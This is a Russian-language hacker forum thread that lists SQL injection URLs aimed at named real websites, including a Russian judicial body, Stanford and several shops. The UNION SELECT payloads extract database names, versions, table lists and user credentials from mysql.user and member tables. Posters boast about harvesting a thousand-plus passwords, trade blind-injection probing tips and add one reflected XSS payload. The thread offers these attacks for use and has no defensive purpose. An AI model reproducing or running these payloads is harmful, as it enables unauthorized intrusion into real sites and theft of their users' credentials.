SQL Инъекции

http://www.promtractor.ru/products_show.php?section=9&id=75'

Тракторы =)

 

http://ru-board.com/new/article.php?sid=-99+union+select+1,2,3,concat(user(),' ','preved'),5,6,7,8,9,10/*

 

http://job.ukr.net/viewvac/view_IDvac.php?vid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,email,password,19,20,21,22,23,24,25,26,27,28,29,30,31+from+members+limit+1000,1/*
мемберов с пассами не меньше тысячи О_о

 

http://uvm.edu/theview/article.php?id=-2043+union+select+1,database(),3,4,user(),6,7/*

 

http://daninvest.by/id_3/product.php?id=5555%20union%20select%201,DATABASE(),3,4,5,6,7,8/*

http://www.advance-acoustic.com/fr-product.php?id=-4%20union%20select%201,2,3,4,DATABASE(),6,7,3,8,9,10/*

http://www.puppetshowbooks.com/product.php?id=-5'

http://www.standard.md/product.php?l=ro&id=-5'%20union%20select%201,table_name%20from+INFORMATION_SCHEMA.TABLES+limit+3,4/*

 

http://www.clasp.org/publications.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

 

PHP:

http://www.worstpreviews.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*

 

Code:

http://www.karlcore.com/articles/article.php?id=-1+union+select+1,2,USER(),4,VERSION(),6/*

 

http://www.splav.kharkov.com/mat_start.php?name_id=-1+union+select+CHAR(207,208,197,194,197,196,32,204,197,196,194,197,196,33)/*

СтЭнфорд ))
http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,password,17,18,19+from+mysql.user/*

http://atvmarket.ru/select.php?cat=-1+union+select+version(),3/*


http://www.ecoross.ru/persons.php?name_id=-1+union+select+user(),2,CHAR(198,232,240,232,237,238,226,241,234,232,233,32),4,5,6,7,8,9,10,11,12,13,14/*

http://mir-tech.ru/group.php?cat=-1+union+select+CHAR(193,229,199,239,192,237,210,238,194,251,201,32,204,224,195,224,199,232,205,33)/*

http://fanats.ru/?n_id=-1+union+select+1,2,email,555,5+from+user+limit+3,3/*


http://www.websib.ru/new_detail.php?new_id=-1+union+select+user,password,1+from+mysql.user/*

 

http://bbq-grilling-recipes.com/recipe.php?recipeid=-1+union+select+0,concat(userid,0x3a,login,0x3a,password,0x3a,email)+from+users+limit+1,1/*


ps это двиг.
/siteadmin/addad.php?groupid=4

 

http://filmmakers.node9.org/author.php?name_id=-5'%20union%20select%201,VERSION(),3,4,5,6,0,6,DATABASE(),USER(),9/*
помогите с table informations =(

 

http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+null,2,concat(memberName,char(58),passwd,char(58),PasswordSalt),4,5+from+smf_members/*
A-ONE

 

http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,null,null,null,null/* Вот только обидно не выводится не чего из таблици;(

P.S. просто из-за внемательности

вот только косяк в том, что из базы беруться цифры и потому уже идет генерация ресунка, т.е цифры служат именами для файлов, там уже не чего нельзя сделать!

 

перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1,1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1,1)))>100)

 

НЕ люблю по символьный перебор потом дам тебе имя таблиц, а то не помню куда закул их, потом выложишь http://forum.antichat.ru/thread28658.html

 

Правда не чего интересно!

 

http://www.vkks.ru/second.php?columnValue=-99+union+select+convert(concat(user,0x3a,password)using%20cp1251),2+from+mysql.user/*
Высшая квалификационная коллегия судей
Российской Федерации

 

http://www.ugd-soft.ru/?mode=press&id=-1+union+select+1,2,3,4/*

 

http://www.worthplaying.com/article.php?sid=-1+union+select+1,2,pass,4,name,6,7,111+from+users/*

Чють Чють не ф тему но там же
http://www.worthplaying.com/user.php?op=userinfo&uname=7'%3Cscript%3Ealert()%3C/script%3E

 

2Diagen почему же =) можно поля поискать.. не зря таблица юзеры называется..

+ раньше был локал инклуд .. сейчас хз

http://keep4u.ru/album.php?view=-1'+union+select+1,2,convert(user()+using+cp1251),4+from+users/*